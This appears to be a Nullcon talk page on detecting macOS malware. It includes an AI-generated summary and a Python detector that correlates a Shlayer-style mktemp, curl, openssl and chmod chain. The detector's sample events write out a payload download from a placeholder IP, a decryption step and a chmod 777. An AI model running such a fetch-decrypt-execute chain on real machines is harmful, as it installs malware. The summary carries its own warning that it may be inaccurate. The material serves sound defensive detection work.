The Different Faces Of macOS Malware: Detecting Anomalies In A Poisoned Apple

By Amit Malik, Pratik Jeware on 08 Sep 2022 @ Nullcon
#macos #malware-detection #endpoint-protection
Focus Areas: Security Operations & Defense, Endpoint Security, Malware Analysis

Abstract

Ever since its inception, the Apple ecosystem has witnessed a remarkable three-decade journey proving its pedigree. During this period, the security industry has also witnessed a growing plethora of malware targeting different versions of macOS operating systems.

This session will take a shift-left approach to identifying a needle in the haystack: How to think like a threat actor attacking macOS endpoints. Using the data ingested in our threat intelligence systems and two years of extensive research, we shed light on the built-in macOS utilities that are used or have the potential of being used by threat actors in their attack kill chain. With the increase in work-from-home policies, the attendees will learn how to identify suspicious activity on the increasingly popular macOS platform.

AI-Generated Summary

This research examined the macOS malware landscape and detection techniques from a defensive perspective. While macOS malware remains less prevalent than Windows threats, the analysis found a notable increase in cross-platform APT groups targeting macOS: groups such as Lazarus, WildPressure, and Iron Tiger have expanded from primarily Windows-focused operations to include macOS targets. Silver Sparrow marked a milestone as one of the first macOS malware families to ship a native binary for Apple's M1 (arm64) architecture.

The research identified key trends in macOS threats, including the increased use of "living off the land" techniques, where attackers chain legitimate system utilities rather than dropping custom tooling. Commodity malware families such as Shlayer and Bundlore dominated infections; Shlayer lures victims with a fake software update (typically an Adobe Flash Player installer) and then drives the infection with built-in utilities: mktemp to stage a working path, curl to fetch the encrypted payload, openssl to decrypt it, and chmod to mark it executable.

The study demonstrated how process-behavior detection based on correlation can identify malicious activity patterns. By analyzing sequences of legitimate utility invocations and mapping each step to MITRE ATT&CK techniques, defenders can distinguish benign from malicious use of the same binaries. The research highlighted osquery as a powerful cross-platform tool for endpoint monitoring and detection on macOS.
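The Shlayer chain in the previous paragraph (mktemp, then curl, then openssl, then chmod) and the correlation-based detection this paragraph describes, as an added example that is not code from the talk or the speakers. The event schema is a simplified stand-in for osquery's process_events columns (pid, parent, path, cmdline, time); the sample events, the 60-second window, the command-line predicates and the ATT&CK mapping are this example's own assumptions.

```python
"""Correlate macOS process-start events into a Shlayer-style living-off-the-land chain.

Added example: the ProcEvent schema mimics osquery's process_events columns; the sample
events, the 60-second window and the ATT&CK mapping are assumptions made for this example.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    ts: float       # seconds since epoch
    pid: int
    ppid: int       # the interpreter (sh/bash/zsh) that spawned the utility
    path: str       # executable path, e.g. /usr/bin/curl
    cmdline: str    # full command line


def chmod_adds_exec(cmdline: str) -> bool:
    """True for 'chmod +x ...', 'chmod u+rwx ...', or an octal mode with an execute bit set."""
    for tok in cmdline.split()[1:]:
        if "+" in tok and tok.endswith("x"):
            return True
        if tok.isdigit() and len(tok) in (3, 4) and any(int(d) & 1 for d in tok[-3:]):
            return True
    return False


# The chain in the order a Shlayer dropper script runs it. Each stage is
# (binary name, predicate on the command line, ATT&CK technique ID or None).
Stage = Tuple[str, Callable[[str], bool], Optional[str]]
STAGES: List[Stage] = [
    ("mktemp",  lambda c: True,                              None),         # stage a temp path
    ("curl",    lambda c: "http" in c,                       "T1105"),      # Ingress Tool Transfer
    ("openssl", lambda c: {"enc", "-d"} <= set(c.split()),   "T1140"),      # Deobfuscate/Decode Files
    ("chmod",   chmod_adds_exec,                             "T1222.002"),  # Permissions Modification (Linux/Mac)
]
WINDOW_SECONDS = 60.0   # all four stages must start within this span of the first one


def correlate(events: List[ProcEvent]) -> List[dict]:
    """Return one alert per parent process whose children run the full chain, in order, in time.

    Unrelated children in between are ignored; a stalled chain is abandoned once the
    window expires, so a developer's curl followed by chmod an hour later never fires.
    """
    by_parent: Dict[int, List[ProcEvent]] = {}
    for ev in events:
        by_parent.setdefault(ev.ppid, []).append(ev)

    alerts: List[dict] = []
    for ppid, children in sorted(by_parent.items()):
        stage = 0
        matched: List[ProcEvent] = []
        for ev in sorted(children, key=lambda e: e.ts):
            if matched and ev.ts - matched[0].ts > WINDOW_SECONDS:
                stage, matched = 0, []          # window expired: start over
            name, predicate, _ = STAGES[stage]
            if ev.path.rsplit("/", 1)[-1] == name and predicate(ev.cmdline):
                matched.append(ev)
                stage += 1
                if stage == len(STAGES):
                    alerts.append({
                        "parent_pid": ppid,
                        "pids": [e.pid for e in matched],
                        "binaries": [s[0] for s in STAGES],
                        "techniques": [s[2] for s in STAGES if s[2]],
                        "span_s": round(matched[-1].ts - matched[0].ts, 3),
                    })
                    stage, matched = 0, []
    return alerts


# Constructed sample events (not captured data); 198.51.100.7 is a documentation-range address.
SAMPLE_EVENTS = [
    # /bin/sh (pid 500) runs the whole chain within a few seconds
    ProcEvent(1662600000.0, 501, 500, "/usr/bin/mktemp",  "mktemp -t Installer"),
    ProcEvent(1662600001.2, 502, 500, "/usr/bin/curl",    "curl -fsL http://198.51.100.7/ab.enc -o /tmp/ab.enc"),
    ProcEvent(1662600002.5, 503, 500, "/usr/bin/openssl", "openssl enc -aes-256-cbc -d -in /tmp/ab.enc -out /tmp/ab -k key"),
    ProcEvent(1662600003.0, 504, 500, "/bin/chmod",       "chmod 777 /tmp/ab"),
    # a developer's zsh (pid 700): curl, then chmod +x an hour later, no mktemp or openssl
    ProcEvent(1662600000.0, 701, 700, "/usr/bin/curl",    "curl -O https://example.com/tool.sh"),
    ProcEvent(1662603600.0, 702, 700, "/bin/chmod",       "chmod +x tool.sh"),
    # a lone mktemp from an interactive shell (pid 800): the chain never completes
    ProcEvent(1662600010.0, 801, 800, "/usr/bin/mktemp",  "mktemp -d"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Keying the state machine on the parent pid is what turns four individually harmless binaries into a signal: each utility is common on a developer's Mac, but the ordered sequence under one short-lived shell within a minute is not. The same predicates can be fed from an osquery process_events query filtered by parent and time; a production rule would also inspect the parent's own ancestry (an installer or a .app bundle under /Volumes is a stronger signal than a Terminal session).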

Case studies of malware families (Shlayer, XCSSET, Silver Sparrow) and offensive tools (Bella, LaZagne) showed how attackers chain legitimate macOS utilities to achieve persistence, credential harvesting, and system compromise while evading traditional signature-based detection.

Disclaimer: This summary was auto-generated from the video transcript using AI and may contain inaccuracies. It is intended as a quick overview; always refer to the original talk for authoritative content.